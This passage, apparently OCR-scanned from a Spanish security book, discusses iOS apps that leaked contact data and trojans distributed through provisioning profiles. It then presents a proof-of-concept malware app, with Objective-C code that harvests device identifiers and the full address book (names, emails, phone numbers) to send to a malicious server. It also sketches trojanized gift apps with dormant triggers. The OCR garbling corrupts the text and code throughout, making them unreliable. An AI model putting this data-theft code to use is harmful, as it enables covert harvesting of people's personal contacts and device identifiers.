Udfd-Oc4e5et>4ctf5b0db8f947faad49ftflec361 562041  capf=6lDE49A7A5A624  3  B5BB97607S3EC3EAFfc 
fptS”  1 0&pnum=04t  4%2061 0%2050C  &madEl“íPíK«ie&5 

Host:  vl.stonrr8.Gom 

User-Ageni:  Mo^Lta/5.0  (íPhor^í  U;  EPÜ  iPhcne  06  3^0  líke  ^tec  OS  X:  en  us)  AppteWebKít/ 528.18 
(KHTML,  Iffee  Cedro)  MobilEy7A341 

applícatio  n/xmi,  appl  ícation  /xhtml+xml,%xt  /btin  L^q^rO. 9,  text/pbi  n:  q^O.  8,  image/ 

y*;q^.5 

Accept-Langyage:  en-us 
jtccept-  Encodfaig:  g^ip ,  deflate 
tonnecLion:  k^(>ahve 

Pnoxy-CorjUtfCttOfi:  top-allve _ 

07.02:  Log  de  la  aplicación  Van^pires  Uves  de  la  cmpnfüa  S¿orf7iS. 


Paih,  Twittcr  y  otras  apps  sociaLs 

Aquí  no  acaba  la  hí^híl  otro  caso  conocido  fue  el  de  Pafh.  El  invci^Ligadnr  Artm  TamphL  intentando 
realizar  un  de  la  ¿jpp  a  OS  iisói  un  proxy  paiTi  ver  las  peticiones  a  la  APJ^  y  descubrió,  que  la 
app  enviaba  todos  los  datos  de  la  agenda  a  los  servidores  de  Path,  sin  permiso  previo  del  nsuari£>. 
Las  siguientes  imágenes  son  una  captura  de  la  petición  que  re£ili/.íiba a  los  servidores : 


«1:24:31 

POST  http5://<^.path.OTi^corr^ 

«It24i32 

^  260  opplicoti-on/x-p'listi  S5B 

Request 

HC^: 

ópi.pcHuh.Oom 

Path/2-6*5  (^»atwíirf</54ít*0.4  l^íwtn/11,0.0 

Cbrrtent-Length: 

nm 

Accept: 

*/m 

Autlnrlzcition: 

Ccmtient-Type ; 

mlttiwrt/iWdatai  - 98fE2Ca9-«W-^2a»-9MC-2E«IBF«6E3 

Acc^apt- Chorset ; 

iitf-8 

X-PATH-CirafTí 

i<IS/2,e.5 

Tniagcn  07.(13:  Fcuüión  P-ufh  que  enviaba  todos  tos  datos  de  la  agenda  de  eontaciu^i  u  los  vicrnírv.  (Parte  1). 
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X-M-ffl-CLiaíT; 

ios/z.e.5 

X-PíftlH-TIÍCZCÜCí 

X-PATH^LOCALE; 

en 

Aoccpt-  Lon^fuc^ : 

Acc€pt-Encc3dÍTig : 

Qzipi  deflcrte 

OomNfCtlotií 

keop-alive 

Praicy'Goiifkection  r 

--..„..9BFE2C»9-«ÍM-42M>9MC-2EWiaFMS3C(V««ib>IH.s^iiÍ4)n;  ftjrn.d(*íi!  nowc-'oost'Confcent- 

lililí  ^tíii  07.03:  Pe  lición  de  Paíh  que  enviaba  todos  los  dalos  de  la  agendfi  de  oonlaeiot.  a  loy  í'í/Ttrí,  (Parte  2). 


Y  la  lista  continúa,  ya  que  iticlnso  ¿zrandes  como  Tmtter^  también  se  han  visto  envaieltos  en  escándalos 
similares  etni  el  tema  de  los  contactos^  debido  a  que  cuando  los  usuarios  uLílizaban  la  opción  bmear 
amigos,  sus  contactos  pasaban  a  ser  de  TMiííEr  durante  18  meses.  A  contmuacioTi  se  muestra  una 
captura  de  la  opción  eii  la  app  de  iOS\ 


Rnd  friends 


Sbab  íor  péóplé 

'l^óWiOii  Twíttdr'' 


\ma^í-A]  07.04:  Üpdón  dc^'Buscar  amigos"  quc  caviaba  los  coriaotoí;  a 


Además  muchas  empresas,  como  Vtber¡  FourSquarí^,  Instagram.  Hipsrer^  han  tenido  problemas 
similares.  Para  finalizai  este  punto,  simplemenTe  decir,  que  en  la  mayoría  de  los  casos  presentados 
anteriorií lente  y  para  colmo,  los  datos  se  enviaban  sin  cifran  lo  qnc  deja  claro  que  los  controles  de 
la  App  Store  no  son  perfectos. 

Un  maJware  dirigido  por  la  App  Stíirc:  TnstaStock 

Sm  embargo,  la  prueba  más  importante  de  que  se  puede  hacer  un  ataque  de  malwai^  a  través  de  la 
App  Store  lo  hizo  el  investigador  Charlie  Mi¿ler\  quien  consiguió  inlrEttlucir  una  app  con  funciones 
de  dropper  que  descargaba  software  inal ¡cítiso  desde  Internet  sin  pasar  por  la  firma  Apple, 

No  obstante,  la  mejor  fonna  de  utilizar  la  App  Store  para  hacer  un  software  malicioso  sena  crear 
un  soítw'are  aílictivo  y  recomendable  (por  ejemplo  uii  Juego  que  tuviera  un  coste),  que  pudiera  ser 
regafado  a  las  personas  que  se  quiera  Iroyani/ar,  y  que  tenga  funciones  dormidas  que  solo  se  activen 
en  determinadas  ciicunstaneias,  como  por  ejemplo  con  tm  determinado  UDID  o  cuando  llegue  un 
mensaje  oculto,  por  ejemplo,  por  medio  da  una  iinagen  con  esíegaiiograíTa  cargada  desde  Internet. 

Por  supuesto,  este  seria  un  ataque  costoso,  pero  visto  los  eícstts  de  Find  And  CaU^  imfaStock  o  las 
aplicaciones  sociales,  es  más  qnc  factible  poder  realizarlo. 
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Íniageíi  HT.ÜS:  hmaStúck. 


3.Troyaiios  sin  AppStore 

No  solo  es  posible  dismbuir  aplicacioneüj  a  LeTminales  iPhane  o  ¡Pad  pasando  por  la  Ápp  Store ^  y 
sofhvaie  de  espionaje  muy  pop  alai*  como  F'mSpy,  utiliza  estos  sistemas  para  troyanizar  tcnniTialcs 
iPhone.  La  idea  es  muy  seneilla,  eoiisiste  eo  coíivenceJ  al  usuario  de  que  instale  una  aplicación 
que  se  ha  distribuido  utilizando  im  provísíomng profile^  es  deein  ufi  certificado  de  despliegue  de 
aplicaciones  generado  a  pattir  de  un  certiñeado  de  desarroliador  oficial que  permite  instalar 
una  app  cíinereLa  en  un  disposiLivo  concreto,  este  es  el  proceso  para  construir  un  mal'warú  en  este 
entorno. 


Tróvanos  con  Provisioning  Profiles 

Es  un  tema  de  sobra  conocido  en  la  comunidad,  tanto  por  los  investigadores  de  seguridad,  como 
por  algunos  desarrolladores  o  administradores  de  flotas  de  dispositivos  a  nivel  corporativo,  que  es 
posible  instalar  una  aplicación  iOS^  (es  decir  un  fichero  con  e?:tensión  Apa)^  en  un  dispositivo  íOS^ 
creando  un  perfil  específico  pam  dicho  dispositivo.  De  esta  [bmia  tan  simple  se  podrán,  instalar 
aplicaciones  no  firmadas  por/íp/?/e. 
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Este  es  el  juétodo  utilizado  por  los  des arro  11  adoros  para  distribuir  el  software  que  están  desarrollando 
a  vin  gnipo  de  resters.  Los  desarrolladores  que  pagan  la  licencia  (ííO  €/año)  y  forman  parte  del 
Programa  de  Desarrotio  de  iOS,  tienen  tres  formas  de  distribuir  sus  creaciones.  La  primera  es  a 
través  de  la  App  Síare.,  la  segunda  ofrceorlas  directamente  a  empresas,  y  la  tercera  la  que  se  denomina 
A  d-Ho  c  D  istíi huüon . 

Es  esta  última  opción,  la  que  los  desarrolladores  utilizan  para  testear  sus  apps,  ya  que  este  método 
permite  compartir  una  app  con  hasta  cien  dispositivos,  bien  a  través  de  correo  electrón  i  en,  o  bien 
siibicnrltúa  a  un  scn^itlor  Para  ello  es  necesario,  acompañar  la  aplicación  o  Jpa.,  de  un  Perfii  de 
Áprovisionamiefno  (Fwvísionhtg  prqfiie),  también  conocidos  como  Ferfiíes  de  Daios^  ya  que 
penniteii  la  instalación  de  software  en  el  disposith^o,  niieutías  que  hay  otro  tipo  de  perfiles,  que  son 
los  Perfiles  de  Coriñgu^mción.,  y  que  se  utilizan  a  nivel  corporativo  con  un  sistema  MDM  {Mobíle 
De^dc'e  Management),  para  configurar  y  gestionar  una  flota  de  dispositivos  íOS. 

Existen  varios  tipos  de  Ptvvísiomng  profile,  como  puede  ser  de  desarrollo,  de  distribución,  de 
distribución  Cüiqiorativa,  y  cada  uno  de  ellos  tiene  caracteristicas  diferentes,  pero  para  la  prueba  de 
concepto,  lo  ideal  es  utilizar  un  Perfil  de  Distribución  (Distñbution  Provisioning prqfiie).  Un  perfil 
de  distribución  se  compone  de  un  nombre,  de  un  conjunto  de  ceitificados  de  desaiTollador,  de  una 
lista  de  idcriLificadores  de  dispositivo  (IJDID),  y  de  llu  idcntificador  de  aplicación  {App  ID). 

Dicho  todo  esto,  queda  claro  que,  teniendo  una  licencia  de  desarrollo,  y  sabiendo  el  identificador 
de  dispositivo  UDID,  se  puede  crear  un  perfil  de  aprovisionamiento  que  permita  instalar  software 
sin  firmar  por  Apple.  Y  aquí  se  encuentra  uno  de  los  problemas  a  la  hora  do  intentar  hackear  un 
dispositivo,  y  es  que  no  se  sal>e  el  UDID  de  la  viemna,  aunque  hay  varias  fonnas  de  intentar 
avenguarlo,  esos  detalles  se  cOHiemarán  en  el  apartado  cte  distribución  del  malware. 


Construyendo  un  malware 

Llega  el  inomenm  de  realizar  la  prueba  de  concepto  de  cómo  impl ementar  un  maiware  en  iOS.  Esta 
prueba  de  concepto  se  basa  en  fugas  de  datos  confidenciales,  al  igual  que  ha  ocurrido  liistóricamente 
en  varias  apps  existentes  en  k  App  Store,  rneneiu nadas  an ten orm ente*  En  concreto  el  robo  de  la 
agenda  de  contactos  o  de  identificadores  únicos  del  dispositivo,  como  UDID,  IMEl,  etcétera. 

La  idea  de  esta  pmeba  de  concepto,  es  desarrollar  una  aplicación  que  acceda  a  este  tipo  de  datos,  y 
que  sean  enviados  a  un  seivídor  (//7TP£/i6/ PainiX  previanieíilc  montado  y  configurado  para  recibir 
y  almacenaren  fichero  o  en  una  base  de  datos,  la  información  enviada  por  cada  dispositivo  en  el  que 
se  ejecute  este  mahxwv. 

Para  el  desarrollo  de  esta  POC,  es  necesario  por  un  lado  el  desarrollo,  tanto  de  la  aplicación  cliente 
en  iOS,  en  donde  se  realiza  el  robo  de  datos,  como  la  aplicación  web  o  servidor,  a  donde  se  envían 
ios  dalos  sustraídos,  Además,  y  una  vez  que  todo  el  sistema  está  implementado,  hay  que  realizar  la 
disti’ibución  de  la  aplicación,  pero  eso  se  detalla  en  el  siguiente  apartado. 
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Client  side  (iOS) 

Como  dirían  en  algún  buen  blug  do  prograi nación  iOS,  “ó'/íovr  rne  the  codeP .  Es  eí  m ornen de  ver 
como  impíementar  el  código  que  accede  a  est>s  codiciados  datos  conti  den  cíales,  como  pueden  ser 
IJDTD,  IMEl,  etcétera,  o  a  los  datos  de  la  agenda  de  contactos.  Se  va  n  dividir  eo  ües  apartados,  el 
primero  acerca  de  idcrtiíicadorcs  únicos  de  dispositivo^  el  segundo  apartado  acerca  de  la  agenda  de 
contactos,  y  el  tercer  y  último  apartado  sobre  el  envío  de  los  datos  a  un  servidor  malicioso. 

Identificadores  únicos 

l  os  idcnüñcadoies  únicos  son  o  han  sido  muy  utilizados  por  los  dcsan-olladoies  o  empresas,  para 
identiñear  a  los  ijsiiari<js  de  sus  aplicaciones,  y  así  poder  ofrecerles  publicidad,  ofertas^  y  de  csla 
maiieni  obtienen  la  posibilidad,  no  solo  de  desarronar  sus  canipaílas  de  marketing,  sino  de  ofrecerle 
al  usLiano  buscar  amigos,  conocidos,  y  en  general  establecer  redes  de  con  lautos,  que  aumenten  la 
experiencia  de  usuario,  y  por  Lamo  la  satisfacción  de  estos,  y  probablemente  el  número  de  descargas. 

De  hecho,  de  ahí  provienen  muchas  de  las  fugas  de  datos  conocidas  (algunas  de  ellas  presentadas 
anlcriormente),  Y  hasta  que  no  se  han  presentado  demandas  coluciivas,  o  Apple  decide  intervenir, 
parece  que  las  uniprcsas  no  comienzan  a  dejar  de  lado  estas  malas  prácticas ^  Y  es  qnc  Apple,  duiante 
el  año  2012  ha  estado  avisando  a  los  des  arrolladores  que  se  alejasen  de  estas  prácticas,  y  feralmente 
ha  comenzado  a  rechazar  apps  que  hagan  uso  del  UDID.  o  que  intenten  enviarlo  a  sus  seixidores. 

A  continuación  un  correo  de  Apple  rechazando  una  app  de  la  compañía  ihpBots  por  hacer  ijs(]  de 
estas  prácticas: 


07.06:  Correo  de  Apph  rechazaiido  una  aplicación  da  TáipBoís  qm  buL^ti  li^ü  tlA  UDID. 


A  partii  del  momento  en  que  Apple  comienza  a  rechazar  apps,  se  empieza  a  ver  en  foros  y  webs  de 
programación,  como  los  desarrolladores  intentan  cambiar  los  métodos  n  lóuuicas  para  identificar  a 
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los  usutiiios  de  iiiciíicríi  tiíiivocíij  os  decir  implciiieiitíir  l(j  Ljitc  ss  conoce  coíiic  ^^ítíicJíiníL"' ^  utíli^íiTido 
técnicas  nn  poco  más  refinadas  que  simplemente  utilizar  el  UDID. 

Algunos  programadores  o  empresas  incluso  han  publicado  sus  propios  desarrollos  para  continuar  el 
seguimiento  o  tracking  de  los  usuarios,  una  vez  que  Apple  lia  cstahlecido  como  '-depi-ecaíed"  el  uso 
del  UDID,  corno  pí ir  ejemplo: 

-  OpenUDlD:  Proyecto  iniciado  por  Yann  LcchcUe  (cofuudddor  de  Appsi’ire),  y  a\  que 

se  han  ido  incorporando  muchos  colaboradores,  empresas,  e  incluso  se  ha  portado  a  otros 
sistcTTias  operativos.  La  t»eb  oficial  del  proyecto  está  situada  en  giíhub:  hllpíi://gitkiS.comfl 
yhúMlIe/Op^nUDID.  j  ^  c 

-  SecurctDTD:  Otro  proyecto,  con  algunas  difereiicias  respecto  al  amerion  pero  en  lincas 

generales  con  el  mismo  objetivo.  La  web  oñeial  del  proyecto  de  crashiviií^^'  es  la  siguiente: 
hip://securcud¡d(xmtjy  la  web  del  proyecto  en  gitlmb:  kíípy://sithuh.  com/eras fdvttcÉ 
secumuclíd  ■  ^ 


A  continuación  una  pequeña  comparativa  de  estas  alternativas  al  clásico  LIDIU: 


Secur^üD^ 

OpefillOlD 

UDID 

Cross*app 

klenlííicatlafi 

Qevic««. 

Alfciw 

Bfd-u^r 

upl-oul 

V: 

■Ji 

Sei3Uffli 

h> 

domab’  snly 

P7.07: 

:  Coirpíii-3thfa  de  ¿ilL^muEivas  a]  cláhicn  UDID. 

Como  se  puede  comprobar  echando  un  vistazo  a  estos  proyecüjs,  comienzan  a  aparecer  alternativas 
mas  n>bustas,  que  el  saiiple  llso  del  UDID.  Se  ven  códigos  más  serios  (tan Lo  en  estos  proyectos, 
como  en  oüas  alteiiiaLivas  propuestas  por  desarrollad  ores  en  los  ib  ros  como  srackoverflovi')^  en  los 
que  se  puede  encontrar  el  uso  de  cifrados,  hasñes,  semillas,  vcciores  de  inicial ización,  y  en  general 
algoritmos  de  generación  de  i  denri  fie  adores  únicos  que  no  dependan  de  datos  confidenciales,  o  de  un 
usual io^conti asena,  y  que  además  se  envien  cifrados,  Lu  fin,  como  se  decía  anteriomienLc,  algo 
más  sentí,  estable  y  seguro.  ’  * 

Y  du.vpijés  de  esta  pequeña  iniroducdójj  ai  mundo  ik  los  identiñeadores  únicos,  y  como  se  dij»  a( 
principio  del  apartado,  es  hora  de  mosírar  el  código.  A  contiiiu ación  se  muestra  un  método  en  el  que 
se  accede  a  diferentes  identificadores  únicos  del  dispositivo; 
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-  (void)  readlíniqyeld^tifiérs  { 

l>{SLaq(i:§:*‘Reádiríq  device’s  iris*,*")* 


HSString  muiriStrÍAg  =  rü.1; 

CFUUlDRfif  yuití  =  CFUUIDCreateíNULLS í 
if  C  J4JÍ(Í)  { 

//uuidString  -  ( _ bridge  MSString  +yCFUUIDCreateSt ringÍNULL,  unid}; 

uuid  S  t  r  ing  =  t  WES  t  r  ir  g  ¡  CFUU IDC  rea  teSt  ring  £  NU  LL ,  uu  id }  ¡ 
C^nelaaseíuiild); 

1 

NSLog(@"ÜDID  with  CF  classes  Í5í  ,  uuidString) ; 

//  Classic  ntethod* 

NSStrirtg  *udi(í  =  íjUIDevlce  ciirrentDevicel  uniqyéldentif  ier] ; 
NSLogí^UDlD  is;  *^''gudid); 

//  Alterndtive  1  ÍNSUUID  classí- 

NSString  ^üdídl  -  IlNSLHJIR  UUTDl  UÜIDStringlj 

NSLagl|i"NSUUIE>  is:  Sb@'%udidl); 


//  Alte rnat ive  2  ÍUIDevlce  class>* 

NSStrirg  +udid2  ^ 

NSLogl@"rdentified  fer  vendo r  is:  ^*,udidZ); 

//  Alternatlve  3  {ASIdentifierHanager  classi^  requires  AdSupport  f  ranievrúrk) : 
NSUUtl>  ^UilID  -  [  [ASIdentlf  ierHanatpe-r  sbaredHanagsr]  odvertisingldentifierl ; 
NSString  +udid3  «  ÍLUID  UUIDStrijigl; 
wSLogí^’^AiJvertlsing  identifier  is:  %íb",  udidB) ; 


NSLí>9C^*\n\ri">; 


t inage Ji  07  OS:  Método  irnpleménludü  parii  aotedor  a  i dentifie adores  únicos  de  disposiiivo. 


Para  utilizar  este  método,  eí  único  requisito  previo,  será  importar  clframewarkAdSiipporí^  píira  poder 
utilizar  la  alter  nativa  3,  en  la  qne  se  accede  al  i  den  ti  fie  ador  relacionado  con  temas  de  publicidad  o 
el  uso  de  la  plataforma  iAdvertrsemefít.  Una  vez  que  se  ejecute  el  código  se  obtendrá  uii  resultado 
similar  al  que  se  puede  apreciar  en  la  siguienle  captura: 


neading  dervie^ '  s.  ida.., 

UOIO  with  CF  class^s  ist  l3CD45BHp-E7B3-414fr-B7AC-A7D460FnF3FS 
UDID  i£!  7&ddA7«l2tB41372af9467c74eic78eaB»e0i«Ba 
NSUUID  iS!  a27BaE7B-DEIE>-4aaB-a81C-313339AIAD&e 

Id«ntifl(ad  for  vendor  ia:  < _ NSCOfkCratftUUia  axa49aEi4a>  2e23SDSS->2E77-tA4a-a45a-eEDáS44SG6a6 

Advsrtising  id«ntifúr  ii:  SaF3E348-A52C-4E7A-a4CA-a912BA2£4lBa 


Imagen  07,09:  Salida  por  consola  del  mélodoquc  extrae  varios  idenrifioadjüres  únicos  de  dispositivo. 


Estos  identificadores  se  han  obtenido  con  el  Simulador  de  iPhone  de  Xcode,  pero  se  pueden  extraer 
los  mismos  datos  de  uii  dispositivo  real. 
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iding  d€^vice^5  ids... 

IZD  MÍ±h  CF  elassflS  is:  ie&7eB95~BllC--44A9-esS«-3Flia9LD30B6 
lio  isi  lB277Sfi99aS3c473cl03l4flílICfac3Saeb35Biifi7 
mUID  ±sí  45l}a5129-ed3^-473li-B3£B-CEaCOAF06B&e 

^iintified  for  vender  iss  < _ fifStoncrflteUUID  BKlffi7€9S0^  7l56F4BC-ei77-4dEE-80&4^5ABBF3£CEBE2 

iMvarils^ing  id«ntifi«r  isi  3B7aa2ai>EI94-^75D«BA5E-QG9743:C3CBEC 


Ím2.gen  07.10:  Sálícb  por  con  so  la.  con  nii  iPfiofie  4S, 

■  Último  cabe  decir,  que  cxíslc  otra  opción  para  realizar  el  tracking,  y  es  ía  de  Litiíi/ar  el  nuevo 
UID^  pero  coino  se  comentado  en  la  comunidad  iOS^  no  es  dcl  Lodo  una  hiiena  opción,  ya  que  solo 
en  tífica  una  instancia  de  la  aplicación,  y  no  al  dispositivo,  por  lo  que  en  caso  de  eliminar  la  app^  y 
einstalaiia  de  nuevo  no  hay  forma  de  enlazarla  o  mantener  al  seguiinierilo  {írackmg). 

[  Addrcss  Book 

Ahora  Loca  ver  qué  opciones  propone  Apple  a  los  desarrollad  ores  para  acceder  a  los  datos  del 
'dispositivo.  Un  esta  prueba  de  conccplo  se  ha  desarrollado  un  código  que  accede  a  k  agenda 
contactos,  además  de  acceder  a  los  identificadores  únicos,  y  posteriormente  se  envía  roda  la 
,  infonriaciím  a  tin  servidor  malicioso. 

[Se  podría  profimdizai^  en  detalles  do  como  funciona  dl  framevwk  que  Apple  pone  a  dispijsición  de 
desan üll adores  para  trabajar  con  la  agenda  de  contactos,  llamado 
sto  no  es  un  libro  de  desarrollo,  por  lo  que  se  centra  simplemente  en  como  robar  los  datos  ctjrno 
pri-ieba  de  concepto  y  nada  más.  Aquí  solo  se  va  a  explicar  el  código  implé  mentado,  más  que  todo  el 
funcionamiento  ú\:\  framewort  Para  aquellos  que  deseen  profundizar  en  ^st^  framewort  en  la  web 
oficial  de  Apple,  está  disponible  toda  la  docurncnüicióu  sobre  clJr¿me^^mrkAddi%s^BoaK^  Incluso 
ejemplos  para  su  niejor  comprensión. 

El  pñmer  paso,  corno  siempre  a  la  hora  de  trabajar  con  un  nuevo  framejwork,  es  importarlo,  por  el 
piétodo  tradicional.  Se  selecciona  el  proyecto  en  Xende,  se  selecciona  el  target  y  luego  se  hace  clic 
en  el  menii  Build Fhme^  >  Línk  Binaiy  Wlth  Líhraries,  se  le  da  a  el  botón  +,  y  se  busca  e\frame\mrk 
, ideseado.  Además,  hay  que  imporfar  el  framework  eu  la  clase  que  se  desee  utilizar,  utilizando  el 
dásico  UiYipon  <-AddmssBook/ÁddressBooLk> 

^  El  segundo  paso,  es  comenzar  a  escribir  el  código  de  nuestra  aplicación  /OS,  que  acceda  a  k 
agenda  de  contactos,  y  para  ello,  lo  primero  será  comprobar  sí  el  usuario  ha  concedido  pemiiso  a  k 
ísplicacióii  para  acceder  a  la  agenda.  Esto  tan  solo  ocurre  dc.^de  iOS  6,  que  ha  sido  cuando  Apple  ha 
Aumentado  la  granularidad,  en  el  control  que  los  usuarios  tienen  sobre  los  permisos  que  conceden 
a  las  aplicaciones  que  instalan,  de  manera,  que  se  solicita  permiso  al  usuario,  cuando  la  app  intenta 
«íCéder  a  los;  contactos. 


Esto  se  aprecia  en  la  siguiente  captura: 


t36 
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"i64_iinakvard”  desea  acceder 

a  sus  contRctcs 

Nu  permitir  OK 


Imagea  07.11 ;  Solicitud  de  auiorizaeióri  de  utiü  app  IOS  psira  acceder  a  lub  coniticLosi. 


Bsto  TIO  está  nada  mal  para  la  tranquilidad  de  los  usuatios,  y  más  Lciiiendo  eo  cuenta  los  casos  de 
robos  de  datos  que  se  han  presentado  anteriormente.  Pero  a  la  hora  de  hackear  o  robar  datos,  la  cosa 
se  complica,  ya  que  si  el  código  dcl  müiware  o  troyano  intenta  acceder  a  la  agenda  de  contactos^ 
se  solicitará  al  usuario  autorización  para  tlicho  acceso,  aunque  solamente  en  caso  de  que  tenga 
instalado  iOS  6. 


Y  ahí)ra  el  momento  de  ver  ei  código  que  chequea  si  el  usuano  ha  concedido  permiso  a  la  aplicación 
para  acceder  a  la  agenda  de  contactos: 


-  <vciicl->  icaníB  í  || 

//  rtcQuest  autharizaticn  te  Adílrcss  I 

//ABAídres&BookRef  =  ABAadressBaakCreátei);  /y  ÉJíprccatcdn ! 

ABAdd ressEookHef  acdresíHookRjef  ^  AB^Add-e&sfiaokCr^flLeViti'OP'titrnsíNULL,  MUL_3í  J/  New  sinta»  in  iüS6.  | 

i  f  i  ADAlId  ressBQofcCetAut  ha  rization  Stst  us  í  I  =  kAflAuthtí!  riiít  ijOíiStat  u  sivíot  Uelse  muned )  í  i 

ABA[ldre5sBDDkIleque5tñccessWithCcRjitetijoríaddre!i&BüükFj!ir]  CFErrorRef  errer}  -[ 

//  First  tile  Access  has  bee^  granted..  1] 

KSLtrgL@" First  tirp®  ac«ís  has  besa  grantec'U:  | 

[  If  rend üjd  £  $i30akL  i  a  cd:  re  i  s  uco^htef  ] ; 

tí: 

J 

else  If  (ABAEfcrMS&aokGetAutfw'lra’clíinStatuíí}  «  kAMiithorizationStat jsAiithorizBcIí  C  i 

//  The  User  has-  previaulty  giwn  accfi&s.  I 

NSLogfí^^Staíus  /luthüi  í¿íü1Í  !  ]"); 
fself  reacAitdrcsíBookíaíííJí'i^SüBookEiíif  1; 

} 

*lsí  if  ÍABftdcressBDokGetAutÍMrizaTiíjnStñtiJsí]  =  MRAiaThnrtzat-InítíitLisDrníed)  -{ 

■  I, 

N:^t  flgtígrstatuft  Deniadüi'Uí  ¡i 

} 

else  if  [ABAdürTcssBDíikGetjiürhorlsatlonStíiTiJsO  —  kABAuthorlzatioiStatusBestrictetlS  ^  I 

//  ...  I 

NSLflfl^irStatus  RestrictEriin’O  j 

} 

else  { 

//  1J-=  üser  hss  preuiously  denied  Access  i 

/;  St'id  díi  dlKi  L  LsUing  ij£»Hi  Lü  i:T'árig«  privacy  setting  th  settings  app  I 

WSLeg tfl  AfÉrirrí^^finRlf  hrt't  h-enn  denled  for  this  arj*  &u  Lu  Gereial  SelLiriSS  to  -nange  privacy  settingi H  ; 

}  ' 


Imagcri  Ü7d2;  Código  para  chequear  ú  el  LLí^iiaria  ha  concedido  pomiisoa  la  app. 
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Fji  iOS  á  ha  habidt)  algún  cambio  y  se  ha  quedado  obsoleto  algún  nieto  do,  pero  el  funcionamiento 
sigue  siendo  prácticamente  ignal.  Sin  entrar  mucho  en  detalles,  el  código  está  cribando  todos  los 
posibles  estados  de  permisos  en  que  se  encuentra  la  aplicación,  y  en  caso  de  que  se  haya  autorizado, 
entonces  se  hace  una  llamada  a  otro  nicíodo  llamado  readAddt^ssEooK  que  es  el  que  realmente  lee 
los  datos  de  los  contactos.  A  este  método  se  le  pasa  la  referencia  a  la  agenda  de  contactos,  creada  en 
la  primera  línea  de  código  de  este  método.  A  continuación  se  presenta  el  código  de  dicho  método: 


-  (void)  reBdAddr«s5Book;(AQAddr¿ssB^kRef)address8ook  1 

KSLd^  Í@'*a)eaííln3  Add  rtss  fidok, . , " ) ; 
íjSLD^t@"\n"); 

//  Irtitlallzations.. , 

NSllInteger  1; 

Jísurnteg&r  j; 
nsuinpteger  k; 

nStlutableDictiQnBry  4^dreEsBDDkai.i:t  =  {[NSMutableDlctijOnarv  alloc)  initlj 
fíSñutableArraiy  +a[Jdres£Büí3kArray; 

//  Starting  to  e^tract  data  frorn  ab. 

KSArrajr  ^people  =  OiSArray  1*=}  ABAddres^BüDkCopyArrav0fAll1%Dple'{addres£BookÍ  r 

if  C  people^oil  ) 
í 

flSLogíl@"Tíiere'i  n&  c&í>tacts  m  adüress  book  to  scanlicn; 

CFfte  Lease  íaúd  ress&^Myk ) ; 
ratyrn; 

> 

for  t  i=0:  i-^rpacple  c&untí;  i++  ] 

i 

sdilre&sSDakArray  -  [  [NSnutaaleArray  atlacTlnitl ; 

AB.^cordRef  p^arsen  -  fABk^cordRef)  [peop^e  □bjattAtlnd^:  i] ; 

NSLogfe*' — —  PrtOMÉ  EUTRV:  •*]; 

//  First  Waws.  ' 

MSString  ^firstname  ÍMSString  +)  ABRjecQndCGpyVsljelpersnn,  kARPFírsonFirstWíiiiiEPropertyJ  i 
MSL«s  First  nane :  ^ ,  f  i  rs  tíiame )  ? 
if  (firstnadie  i=  niU  t 

[  ad  d  res s  BoakA  rr ay  a  íkt Ob  j  ect ;  f irs  tn  ame  1 ; 

1 

[  f  i  rs  tn  »e  ral  &b  se] ; 

/y  ^st  Kantc, 

NSString  ^tastna^  -  (NSStririg  w]  ABReDordCopyValueíppríon,  kABPcrsofiLastNafl^eProparty  i ; 
ñlSLog({5*'LBst  rair*;  %0",  lastnamej; 

If  nastname  nil)  { 

^  CaddressBookArray  addObjectslastnaim?] ;  - 

[lastname  re lea sel ; 

//  Erna lis. 

NSStrIng  -femails  =  ÍNSString  3t)  ABRecardCopyValuetper^OT/  kABPcrsoTtTiailProperty  ^ ; 
crindex  emallsCount  -  ABMLltiValuE^GetCDuntf  eniails  )i 

for  (  j-0;  j<«nailsComt¡  ]++  )  i 

CFStringRfef  emaiWalue  s  ABHiilt iValueCopyValucAtrndex^  effialls,  jí; 

NSLogí^  'Eitail;  %§"  ,éfiiftilValup)  j 
i"f  Ce^ailValue  1-  nilj  { 

[addressSockArray  addObject;  ÍNSSTriog  •)erTyailValu€] ; 

C  FRe  leas  c  ( OBia  ilVa  lu  e } ; 

y 


imagen  07.13:  Primerii  pane  del  eódigo  del  inétodo  ri^adAddn'^yBoo'f,  c|ije  Itíe  la  ajjííiida  de  coniajctos. 
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//  PhníiE  fJuniiers. 

ABHijtab\e?lLiUiVa\uEiíe-f  phoreNjiibers  =  ABRficardCcp^VflliJíípEriQn,  IcASPerioi^íioneP-op^r-ty); 
ti^ índex  phortenunibfrrCaynt  =  AÉHultiVülueGetCotintl  pnanejhJLia&Ers  ); 

for  ^  ki^}  kolioncNiirabcrCounitj  J 

::PStringHeT  pl^EjneNunberLaEJtl  -  ABMü  It iVft’LjeCDp^Labe'iJit  Index  í  phoneWumbersp  k  }i 
CPStringRsT  phoneNyinberVEl.ye  =  ABNultlValueCop/V^lueAt Index  í  phcncWumticrs,  k  )¡ 

ÍFSt  rlngRef  phonel^íuriberLíJcatiZEyíLDbC!!  =  ASArirtres'iHonkCnpyLncaLizedLabeH  phi]nENuiiáierLabe''L  )í 
tü  “inobLle^' 

//  í-ind  thfi  nunbers  of  are  person. 

NSStrintí  iJecompIetePihone  =  [  [(NS£tring#)phíM^ríWijr^f>rl  oíTíjli^Rdl  abel  stringSyApperdingSt 
i;t  r  1  n  g  ByAppe  nú  ing  Si  ring :  (USS  i  r  ingit  I  ption  eAI  Limbe  rVa  luel  ; 

NSLügíi^" Complete  phu^e^  %^',LiJi!ipIetePhí3neí ; 
if  riQfnpletePhone  1=  niU  1 

í  fldd  rti  sü  00  kft  rra y  a  do Dib  j  e  ct :  coii^  le  t  ePíwne  I  \ 

} 

CFRclcEi5c(pbonctjunbí?H  ofali^pril.ahell ; 

C  FRe  ledse  i.p  bui  leMLnilfe  rLdüel )  ¡ 

C  F  Re  lease  ( p  koneNuuiiié  rVa  lu  e ) : 

) 

WSLoqíg'’\n'') ; 

.V  Add  orray  uith  addressbaak  d3-;a  to  the  dictionar,  wirb  iterator  as  key* 

[addressIiookDict  setObjec’tiaddrsssBoakArray  foríCe/:  iNSStrInq  strlngWitbFoniat!@"'%i'*,  íj  I  j 

//  RpTease  array,  ít  rarder  tn  cTean  ruf  riejtt  itefatian. 
ciddre!»!¿BaúkAr  ray  -  nilí 
[addresstSoQkArray  re.eeíel; 


[peap^p  relea^ej  j 
CFRelea  se  I add ressBoak] ; 


IC_05{#'-\n\n''í  j 


)? 


//WSLpp{^‘'j.Tiipriffli.endo  array  aedress  hookz  ,addr«sBcokArrBy] ; 
